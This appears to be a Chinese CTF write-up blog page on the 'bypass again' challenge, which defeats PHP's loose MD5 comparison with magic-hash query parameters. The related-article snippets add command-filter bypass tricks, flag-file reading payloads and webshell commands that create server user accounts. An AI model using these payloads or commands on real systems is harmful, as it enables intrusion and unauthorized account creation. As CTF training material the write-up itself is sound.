CG-CTF-Web-bypass again

最新推荐文章于 2023-01-04 11:46:12 发布
最新推荐文章于 2023-01-04 11:46:12 发布
阅读量681 收藏 2
点赞数 1
分类专栏: CTF刷题 文章标签: CG-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/94389703
版权

bypass again

1.查看题目
在这里插入图片描述
2.进入题目地址
在这里插入图片描述
3.代码分析

if (isset($_GET['a']) and isset($_GET['b']))   //检测变量a和变量b是否设置并且不为NULL,存在的话执行大括号里的
{
if ($_GET['a'] != $_GET['b'])   //if(a不等于b)并且if(md5(a)==md5(b))成立,执行die,否则执行print"wrong"
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}

4.构造payload

a=s878926199a&b=s155964671a

在这里插入图片描述

1stPeak
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CG CTF-Web-bypass again
feng的博客
09-06 230
WP 比较基础的一道题,考了PHP的弱类型比较中的一个考点,就是0e。 实际是这样: “0e123456”=="0e456789"相互比较的时候,会将0e这类字符串识别为科学技术法的数字,0的无论多少次方都是零,所以相等。 因此我们需要找2个经过md5编码后以0e开头的,但是本身不同的字符串,就可以解出本题。这样的字符串上网一搜就有很多。 这里构造 ?a=QNKCDZO&b=240610708 成功获得flag。 ...
bypass again
weixin_30838921的博客
05-28 82
依旧是弱类型 if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) === md5($_GET['b'])) die('Flag: '.$flag); else print 'Wrong.'; ...
南邮 bypass again
weixin_30404405的博客
04-07 112
题目: if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag); else print 'Wrong.'; } 依...
南邮CTF--bypass again
weixin_34288121的博客
05-18 491
南邮CTF--bypass again 提示:依旧弱类型,来源hctf 解析: 源代码: if (isset($_GET['a']) and isset($_GET['b'])) {​ if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag)...
CTF中命令执行常见bypass
m0_58595840的博客
01-04 788
CTF比赛中常见的命令执行以及绕过
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
My-CTF-Challenges
05-16
【标题】"我的CTF挑战"是一个集合,包含了一系列网络安全竞赛中的挑战,旨在提升参赛者在信息安全领域的技能和知识。这个挑战集可能是为一个名为"周大福"的活动或组织设计的。其中的一个具体挑战是"TCTF2018_决赛",...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
Firebasky的博客
09-18 1760
1. web58-65 payload:c=show_source('flag.php'); 2. web66 1.查看flag文件 c=print_r(scandir("/")); c=highlight_file('/flag.txt'); 3. web67 盲猜 c=highlight_file('/flag.txt'); 4. web68-70 尝试include('index.php'); 发现字节太大了 直接盲猜c=include('/flag.txt'); 5. web71 <?php
CTF中的Bypass命令执行
D.MIND 的博客
08-03 2502
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
BUUCTF WEB EASY_BYPASS1
qq_41696858的博客
10-17 336
打开场景,直接给了源码,代码审计,没啥好说的,两个get,一个post,很常规的md5数组绕过,post过去的passwd 数字字符弱相等 $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) {
web渗透中bypass防护系统
Shanfenglan's blog
01-25 2964
文章目录1. webshell执行命令2. sql注入2.1 安全狗mssqlmysql2.2 云盾mysql2.3 云锁mysqlfastjsonsafeline参考文章 1. webshell执行命令 文件上传后向webshell传参数: 三重url编码 三重base64编码 cookie传参 参数污染 http://test/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoami cookie传参对应webshell: x=ls <?php $p=$_COOKI
web攻防漏洞之Bypass安全狗绕过
s11show_163的博客
02-28 1144
目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。 攻击者希望执行: 创建服务器用户: key=echo('<pre>');system('net user a a /add'); 删除服务器用户: key=echo('<pre>');system('net user a /del')...
unctf记一次命令执行bypass
a3320315的博客
10-28 1181
0x01 贴代码 <?php highlight_file(__FILE__); $a = $_GET['a']; $b = $_GET['b']; // try bypass it if (preg_match("/\'|\"|,|;|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tai...
[MRCTF2020]Ez_bypass
夜幕下的灯火阑珊的博客
05-14 3057
F12可以看到格式化好的源码 <?php #I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; ...
CG CTF bypass again
qq_46389295的博客
02-23 190
题目链接 看源码 判断a和b存不存在当a和b的md5值相等时输出flag 典型的md5碰撞 http://chinalover.sinaapp.com/web17/index.php?a=QNKCDZO&b=s155964671a nctf{php_is_so_cool}
Ubuntu-CTF
07-28
CTFd是一个用于举办和参加CTF(Capture The Flag)安全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经安装了虚拟机并配置好了Ubuntu系统。具体的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值